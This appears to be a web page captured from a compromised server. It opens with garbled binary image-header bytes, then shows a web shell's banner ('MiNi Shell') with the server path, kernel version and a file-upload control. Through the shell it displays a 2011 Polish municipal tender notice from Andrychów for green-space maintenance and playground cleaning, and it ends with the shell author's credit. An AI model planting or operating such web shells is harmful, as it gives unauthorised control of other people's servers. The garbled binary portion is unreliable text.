JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110304/36372-N-2011.html

<p class="kh_header"><b>Andrychów: Pielęgnacja zieleni  na terenach  administrowanych przez Zespół Obsługi Mienia    Komunalnego  w Andrychowie i utrzymanie czystości na placach zabaw w  roku 2011</b><br>
<b>Numer ogłoszenia: 36372 - 2011; data zamieszczenia: 04.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Mienia Komunalnego , ul. Metalowców 6, 34-120 Andrychów, woj. małopolskie, tel. 033 8753168, faks 033 8752391.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja zieleni  na terenach  administrowanych przez Zespół Obsługi Mienia    Komunalnego  w Andrychowie i utrzymanie czystości na placach zabaw w  roku 2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót do wykonania w ramach wyżej wymienionego zadania obejmuje:
1. Koszenie terenów zieleni
a) termin i miejsce koszenia każdorazowo będzie następowało zgodnie ze  wskazaniem Zamawiającego. Zawiadomienie Wykonawca powinien otrzymać co najmniej 7 dni  przed planowanym terminem koszenia.  
b) prace należy wykonać przy użyciu specjalistycznego sprzętu z zachowaniem należytej ostrożności,
c)  koszenie należy poprzedzić zbieraniem zalegających na trawniku odpadów ( papier, folia, kamienie itp.); zebrane odpady należy wywieźć na składowisko odpadów komunalnych,
d)  po rozpoczęciu koszenia danego terenu , prace muszą być kontynuowane bez zbędnych przerw aż do ich zakończenia,
e)  obkoszenie drzew , krzewów, elementów małej architektury, znaków drogowych itp. należy  wykonać jednocześnie lub niezwłocznie tzn. nie później niż w ciągu jednego dnia od    wykoszenia trawnika, który je otacza,
f) niedopuszczalne jest powodowanie uszkodzeń lub niszczenie drzew , krzewów 
i pozostałych w/w   elementów   podczas koszenia i innych prac pielęgnacyjnych,
g)  samosiewy oraz odrosty korzeniowe drzew i krzewów w wieku do 5 lat wyrosłe na obszarze koszonych trawników oraz wśród krzewów na nich posadzonych, winny być usuwane na poziomie lub poniżej poziomu gruntu równocześnie z koszeniem trawy lub niezwłocznie po jej skoszeniu, a przed wywozem,
h)  wysokość trawy bezpośrednio po skoszeniu na  żadnym fragmencie skoszonego terenu nie może przekraczać 5 cm,
i) w trakcie koszenia należy unikać zaśmiecania ściętą trawą chodników i jezdni,
j) w przypadku zanieczyszczenia chodników i jezdni skoszoną trawę należy uprzątać na   bieżąco lub bezpośrednio po koszeniu (najpóźniej w dniu koszenia),
k)skoszoną trawę należy zebrać i  wywieźć na składowisko odpadów komunalnych lub zagospodarować we własnym zakresie.
l) planowana  częstotliwość koszenia:powierzchnia do 42410m2 -  3 krotne  
powierzchnia do 13050m2 - 6 krotne,powierzchnia do 40240m2-  2 krotne
2. Pielęgnacja żywopłotu i krzewów
a) ustala się termin pierwszej pielęgnacji do dnia 30 czerwca 2011r., drugiej do dnia 30  września 2011r.,
b) zabieg ma polegać na przycięciu jednorocznych przyrostów żywopłotu i krzewów ok. 5  cm      ponad     poprzednim cięciem,
c) bezpośrednio przed cięciem żywopłotu, krzewu  należy usunąć z niego (wyciąć przy gruncie) wszystkie niepożądane samosiewy i odrosty korzeniowe drzew i krzewów,
d) cięcia należy wykonać przy użyciu specjalistycznego sprzętu,
e) wynikiem cięcia mają być równe płaszczyzny bez krzywizn, wcięć, wystających  pojedynczych pędów itp.,
f) rany po cieciu nie mogą być postrzępione,
g) niezwłocznie po przycięciu , nie później niż w dniu następnym, należy zebrać i wywieźć ścięte pędy na składowisko odpadów komunalnych lub zagospodarować we własnym zakresie.
h) powierzchnia żywopłotu i krzewów - do 8000m2.
3. Usuwanie drzew i żywopłotu.
a) termin realizacji określa Zamawiający,
b) przed przystąpieniem do wycinki należy oznakować teren i powiadomić odpowiednie służby   o planowanej wycince,
c)ścięcie drzew i wycinka żywopłotu nastąpi zgodnie ze wskazaniem Zamawiającego,
d)odcięcie gałęzi i konarów,
e)pocięcie pnia i konarów na odcinki dogodne do załadunku i transportu,
f)przetransportowanie drewna, o którym mowa  w pkt. e , w wyznaczone miejsce zgodnie ze  wskazaniem Zamawiającego na odległość do 3 km,
g)zrębkowanie i zebranie pozostałych gałęzi i wywiezienie ich na składowisko odpadów  komunalnych lub zagospodarowanie we własnym zakresie,
h)uporządkowanie terenu po wycince drzew i żywopłotu, 
i)wyfrezowanie pnia po usunięciu drzewa na głębokość co najmniej 15 cm, w przypadku  żywopłotu wykarczowanie korzeni , zasypanie dołu ziemią, ubicie gruntu i wyrównanie  zasypanego dołu do poziomu otaczającego terenu,
j)przewiezienie ewentualnie pozostałych odpadów na składowisko odpadów komunalnych lub zagospodarowanie we własnym zakresie,
k) wycinka drzew o obwodzie: do 60 cm -  do 5 drzew, od 61   cm   do 120 cm - do 5 drzew,  od 121  cm   do 190 cm -  do 5  drzew, od 191  cm   do 250 cm -     do 2 drzew,
l) wycinka żywopłotu o powierzchni  do  60m2.
4. Prace pielęgnacyjne drzew.
a)termin realizacji usługi określa  Zamawiający,
b) zabiegi w obrębie korony drzewa mogą obejmować wyłącznie :
 - usuwanie gałęzi obumarłych , nadłamanych lub wchodzących w kolizję z obiektami  budowlanymi lub urządzeniami technicznymi, 
- kształtowanie korony drzewa których wiek nie przekracza 10 lat,
- utrzymywanie formowanego kształtu korony drzewa.
c) wymagane jest zabezpieczenie ran po cięciach,
d) sposób prowadzenia prac nie może powodować uszkodzenia drzew,
e) powstałe po pracach odpady należy zgromadzić w pryzmach i wywieźć w terminie  najwyżej 2 dni od ścięcia, w przypadkach powodujących utrudnienia w ruchu w terminie 1 dnia, a w razie powodowania zagrożenia bezpieczeństwa bezpośrednio po ścięciu na   składowisko odpadów komunalnych lub zagospodarować we własnym zakresie,
f) planowana pielęgnacja - do 80 sztuk drzew.
5. Utrzymanie czystości na terenach placów zabaw.
a)  termin realizacji  : od 01 kwietnia  do 15 listopada 2011r.
Powyższy termin może zostać skrócony przez Zamawiającego  ze względu na warunki  atmosferyczne,
b) bieżące utrzymanie czystości  poprzez zgrabienie , zbieranie odpadów i nieczystości z terenu  zielonego jak i z terenu  wysypanego piaskiem i  następnie wywóz zebranych  odpadów i nieczystości  na   składowisko odpadów , 
c)  wiosenne posprzątanie terenu placów  z liści  ,  połamanych gałęzi i innych odpadów  i nieczystości oraz    wywóz  na składowisko odpadów. 
d)  jesienne pograbienie terenu placów z liści. 
e)  wykaz placów zabaw
1.przy pomniku Grunwaldzkim na Górnicy -nawierzchnia trawiasta  1698m2
2.przy ul. Włókniarzy - nawierzchnia trawiasto -piaskowa	   1480m2
3.przy ul. Lenartowicza koło przedszkola - nawierzchnia trawiasto - piaskowa       630 m2
4.przy ul. Lenartowicza między blokami - nawierzchnia piaskowa  448m2
5.na oś. Jana Pawła II - nawierzchnia trawiasta	    1780 m2
6.między blokami ul. Starowiejska 8 i 4 nawierzchnia piaskowa  200m2
ogółem powierzchnia placów zabaw	   6236 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.21.15.00-7, 77.34.20.00-9, 77.31.41.00-5, 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować zrealizowanie przynajmniej trzech usług kompleksowego utrzymania terenów zieleni miejskiej o wartosci nie mniejszej niż 150 000,00 zł brutto, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje następującym sprzętem i urządzeniami:
samochodem ciężarowym typu lekkiego o ładowności do 3,5 tony lub ciągnikiem z przyczepą,  podnośnikiem samochodowym typu (zwyżka) 1 szt.,kosiarką rotacyjną -min. 1 szt., kosiarką trawnikową min. 2szt., kosą spalinową - min. 2 szt.,nożycami do żywopłotów - min. 2 szt., piłą spalinową - min. 1 szt., frezarką do pni - min. 1 szt.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada polisę, a   w   przypadku   jej   braku   inny dokument  potwierdzający,  że  Wykonawca  jest ubezpieczony od dpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 250 000,00  zł. Dokument ten winien dotyczyć przedmiotu faktycznie
wykonywanej przez wykonawcę działalności i winien być zbieżny z przedmiotem 
zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>wprowadzenie istotnych zmian w umowie może wynikać z następujących okoliczności:a)	gdy z przyczyn organizacyjnych konieczna będzie zmiana  osób upoważnionych do dokonywania czynności lub zmiana danych teleadresowych określonych w umowie,b)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.andrychow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Mienia Komunalnego w Andrychowie: 34-120  Andrychów, ul. Metalowców  6, pokój nr 5 , w  godzinach 8,00 do 13 od poniedziałku do piątku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2011 godzina 09:30, miejsce: w Zespole Obsługi Mienia Komunalnego ul. Metalowców 6, 34-120 Andrychów, pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com